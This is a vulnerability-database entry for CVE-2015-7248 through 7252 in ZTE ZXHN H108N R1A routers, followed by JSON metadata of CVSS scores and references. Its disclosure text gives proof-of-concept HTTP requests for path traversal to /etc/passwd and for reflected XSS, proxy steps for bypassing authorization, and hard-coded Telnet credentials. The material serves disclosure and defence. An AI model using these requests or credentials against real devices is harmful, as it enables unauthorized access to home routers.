VAR-201512-0230
Vulnerability from variot - Updated: 2023-12-18 12:30Absolute path traversal vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities: 1. Multiple information-disclosure vulnerabilities 2. An authorization-bypass vulnerability 3. A directory-traversal vulnerability 4. A hard-coded credentials vulnerability 5. A cross-site scripting vulnerability Attackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. CVE-ID: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252
Note: Large deployment size, primarily in Peru, used by TdP.
Description CWE-200 https://cwe.mitre.org/data/definitions/200.html: Information Exposure - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http:///cgi-bin/webproc
PoC:
Login Page source contents:
...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip...
B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE.
CWE-285 https://cwe.mitre.org/data/definitions/285.html: Improper Authorization - CVE-2015-7249
By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as user or support, and may be able to perform actions otherwise not allowed.
PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal.
PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks.
Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only.
http:// /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd
Other functions / pages may also be accessible to non-privileged users.
Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability.
PoC
HTTP POST request
POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177
getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
HTTP Response
HTTP/1.0 200 OK Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59 GMT;path=/
root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
tw:x:504:504::/home/tw:/bin/bash
tw:x:504:504::/home/tw:/bin/msh
CWE-798 http://cwe.mitre.org/data/definitions/798.html: Use of Hard-coded Credentials - CVE-2015-7251
In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password.
CWE-79 https://cwe.mitre.org/data/definitions/79.html: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CVE-2015-7252
In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting [pre-authentication].
PoC
POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177
getpage=html%2Findex.html&errorpage=html%2fmain.htmlalert(1)&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
+++++
Best Regards, Karn Ganeshen
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201512-0230",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zxhn h108n r1a",
"scope": "lte",
"trust": 1.0,
"vendor": "zte",
"version": "zte.bhs.zxhnh108nr1a.h_pe"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a",
"scope": null,
"trust": 0.8,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a",
"scope": "lt",
"trust": 0.8,
"vendor": "zte",
"version": "zte.bhs.zxhnh108nr1a.k_pe"
},
{
"model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a.h pe",
"scope": null,
"trust": 0.6,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a",
"scope": "eq",
"trust": 0.6,
"vendor": "zte",
"version": "zte.bhs.zxhnh108nr1a.h_pe"
},
{
"model": "zxv10 w300 w300v1.0.0f er1 pe",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a",
"scope": null,
"trust": 0.3,
"vendor": "zte",
"version": null
},
{
"model": "zxhn h108n r1a zte.bhs.zxhnh108nr1a",
"scope": "ne",
"trust": 0.3,
"vendor": "zte",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:zte:zxhn_h108n_r1a_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "zte.bhs.zxhnh108nr1a.h_pe",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:zte:zxhn_h108n_r1a:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7250"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Karn Ganeshen",
"sources": [
{
"db": "BID",
"id": "77421"
},
{
"db": "PACKETSTORM",
"id": "134492"
}
],
"trust": 0.4
},
"cve": "CVE-2015-7250",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.8,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2015-7250",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2015-07625",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-85211",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-7250",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2015-07625",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201511-238",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-85211",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-7250",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "VULHUB",
"id": "VHN-85211"
},
{
"db": "VULMON",
"id": "CVE-2015-7250"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Absolute path traversal vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. ZTE ZXHN H108N R1A is a wireless router product of China ZTE Corporation. ZTE ZXHN H108N R1A routers are prone to the following security vulnerabilities:\n1. Multiple information-disclosure vulnerabilities\n2. An authorization-bypass vulnerability\n3. A directory-traversal vulnerability\n4. A hard-coded credentials vulnerability\n5. A cross-site scripting vulnerability\nAttackers can exploit these issues to gain access to the browser of an unsuspecting user and execute arbitrary script code in the context of the affected site, steal cookie-based authentication credentials, gain access to sensitive information, read arbitrary files, or bypass security restrictions and perform unauthorized actions. This may aid in further attacks. \n*CVE-ID*:\nCVE-2015-7248\nCVE-2015-7249\nCVE-2015-7250\nCVE-2015-7251\nCVE-2015-7252\n\n*Note*: Large deployment size, primarily in Peru, used by TdP. \n\nDescription\n*CWE-200* \u003chttps://cwe.mitre.org/data/definitions/200.html\u003e*: Information\nExposure* - CVE-2015-7248\nMultiple information exposure vulnerabilities enable an attacker to obtain\ncredentials and other sensitive details about the ZXHN H108N R1A. \nA. User names and password hashes can be viewed in the page source of\nhttp://\u003cIP\u003e/cgi-bin/webproc\n\nPoC:\n\nLogin Page source contents:\n\n...snip.... \n//get user info\nvar G_UserInfo = new Array();\nvar m = 0;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"admin\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped/; //Password Hash seen here\nG_UserInfo[m][2] = \"1\"; //Level\nG_UserInfo[m][3] = \"1\"; //Index\nm++;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"user\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped\"; //Password Hash seen here\nG_UserInfo[m][2] = \"2\"; //Level\nG_UserInfo[m][3] = \"2\"; //Index\nm++;\nG_UserInfo[m] = new Array();\nG_UserInfo[m][0] = \"support\"; //UserName\nG_UserInfo[m][1] = \"$1$Tsnipped\"; //Password Hash seen here\nG_UserInfo[m][2] = \"2\"; //Level\nG_UserInfo[m][3] = \"3\"; //Index\nm++;\n...snip... \n\nB. The configuration file of the device contains usernames, passwords,\nkeys, and other values in plain text, which can be used by a user with\nlower privileges to gain admin account access. This issue also affects ZTE\nZXV10 W300 models, version W300V1.0.0f_ER1_PE. \n\n\n*CWE-285* \u003chttps://cwe.mitre.org/data/definitions/285.html\u003e*: Improper\nAuthorization* - CVE-2015-7249\n\nBy default, only admin may authenticate directly with the web\nadministration pages in the ZXHN H108N R1A. By manipulating parameters in\nclient-side requests, an attacker may authenticate as another existing\naccount, such as user or support, and may be able to perform actions\notherwise not allowed. \n\nPoC 1:\n1. Login page user drop-down option shows only admin only. \n2. Use an intercepting proxy / Tamper Data - and intercept the Login submit\nrequest. \n3. Change the username admin to user / support and continue Login. \n4. Application permits other users to log in to mgmt portal. \n\nPoC 2:\nAfter logging in as support, some functional options are visibly\nrestricted. Certain actions can still be performed by calling the url\ndirectly. Application does not perform proper AuthZ checks. \n\nFollowing poc is a change password link. It is accessible directly, though\nit (correctly) is restricted to changing normal user (non-admin) password\nonly. \n\nhttp://\n\u003cIP\u003e/cgi-bin/webproc?getpage=html/index.html\u0026var:menu=maintenance\u0026var:page=accessctrl\u0026var:subpage=accountpsd\n\nOther functions / pages may also be accessible to non-privileged users. \n\nArbitrary files can be read off of the device. No authentication is\nrequired to exploit this vulnerability. \n\nPoC\n\nHTTP POST request\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: IP\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101\nFirefox/18.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: https://IP/cgi\u00adbin/webproc\nCookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 177\n\ngetpage=html%2Findex.html\u0026errorpage=%2fetc%2fpasswd\u0026var%3Amenu=setup\u0026var%3Apage=wancfg\u0026obj\u00ad\naction=auth\u0026%3Ausername=admin\u0026%3Apassword=admin\u0026%3Aaction=login\u0026%3Asessionid=7ce7bd4a\n\n\nHTTP Response\n\nHTTP/1.0 200 OK\nContent\u00adtype: text/html\nPragma: no\u00adcache\nCache\u00adControl: no\u00adcache\nset\u00adcookie: sessionid=7ce7bd4a; expires=Fri, 31\u00adDec\u00ad9999 23:59:59\nGMT;path=/\n\n#root:x:0:0:root:/root:/bin/bash\nroot:x:0:0:root:/root:/bin/sh\n#tw:x:504:504::/home/tw:/bin/bash\n#tw:x:504:504::/home/tw:/bin/msh\n\n\n*CWE-798* \u003chttp://cwe.mitre.org/data/definitions/798.html\u003e*: Use of\nHard-coded Credentials* - CVE-2015-7251\n\nIn the ZXHN H108N R1A, the Telnet service, when enabled, is accessible\nusing the hard-coded credentials \u0027root\u0027 for both the username and password. \n\n*CWE-79* \u003chttps://cwe.mitre.org/data/definitions/79.html\u003e*: Improper\nNeutralization of Input During Web Page Generation (\u0027Cross-site\nScripting\u0027) *- CVE-2015-7252\n\nIn the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is\nvulnerable to reflected cross-site scripting [pre-authentication]. \n\nPoC\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: IP\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101\nFirefox/18.0 Accept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: https://IP/cgi\u00adbin/webproc\nCookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 177\n\ngetpage=html%2Findex.html\u0026*errorpage*=html%2fmain.html\u003cscript\u003ealert(1)\u003c/script\u003e\u0026var%3Amenu=setup\u0026var%3Apage=wancfg\u0026obj\u00ad\naction=auth\u0026%3Ausername=admin\u0026%3Apassword=admin\u0026%3Aaction=login\u0026%3Asessionid=7ce7bd4a\n\n\n\n+++++\n-- \nBest Regards,\nKarn Ganeshen\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "VULHUB",
"id": "VHN-85211"
},
{
"db": "VULMON",
"id": "CVE-2015-7250"
},
{
"db": "PACKETSTORM",
"id": "134492"
}
],
"trust": 3.42
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-85211",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=38773",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85211"
},
{
"db": "VULMON",
"id": "CVE-2015-7250"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#391604",
"trust": 4.3
},
{
"db": "NVD",
"id": "CVE-2015-7250",
"trust": 3.6
},
{
"db": "BID",
"id": "77421",
"trust": 1.5
},
{
"db": "EXPLOIT-DB",
"id": "38773",
"trust": 1.2
},
{
"db": "JVN",
"id": "JVNVU91514956",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-07625",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201511-238",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "134492",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-89797",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-85211",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2015-7250",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "VULHUB",
"id": "VHN-85211"
},
{
"db": "VULMON",
"id": "CVE-2015-7250"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"db": "PACKETSTORM",
"id": "134492"
},
{
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
]
},
"id": "VAR-201512-0230",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "VULHUB",
"id": "VHN-85211"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07625"
}
]
},
"last_update_date": "2023-12-18T12:30:10.001000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.zte.co.jp/"
},
{
"title": "ZTE ZXHN H108N R1A patch for arbitrary file read vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/66794"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85211"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"db": "NVD",
"id": "CVE-2015-7250"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "https://www.kb.cert.org/vuls/id/391604"
},
{
"trust": 2.6,
"url": "https://www.kb.cert.org/vuls/id/bluu-9zdjwa"
},
{
"trust": 1.3,
"url": "https://www.exploit-db.com/exploits/38773/"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/77421"
},
{
"trust": 0.9,
"url": "http://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/285.html"
},
{
"trust": 0.8,
"url": "https://cwe.mitre.org/data/definitions/288.html"
},
{
"trust": 0.8,
"url": "http://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7250"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu91514956/index.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-7250"
},
{
"trust": 0.3,
"url": "http://www.zte.com.cn/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/134492/zte-zxhn-h108n-r1a-zxv10-w300-traversal-disclosure-authorization.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7250"
},
{
"trust": 0.1,
"url": "http://cwe.mitre.org/data/definitions/22.html\u003e*:"
},
{
"trust": 0.1,
"url": "http://cwe.mitre.org/data/definitions/798.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://www.zte.com.cn]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7249"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7248"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/cgi-bin/webproc"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/285.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://ip/cgi\u00adbin/webproc"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html\u003e*:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7251"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "VULHUB",
"id": "VHN-85211"
},
{
"db": "VULMON",
"id": "CVE-2015-7250"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"db": "PACKETSTORM",
"id": "134492"
},
{
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#391604"
},
{
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"db": "VULHUB",
"id": "VHN-85211"
},
{
"db": "VULMON",
"id": "CVE-2015-7250"
},
{
"db": "BID",
"id": "77421"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"db": "PACKETSTORM",
"id": "134492"
},
{
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
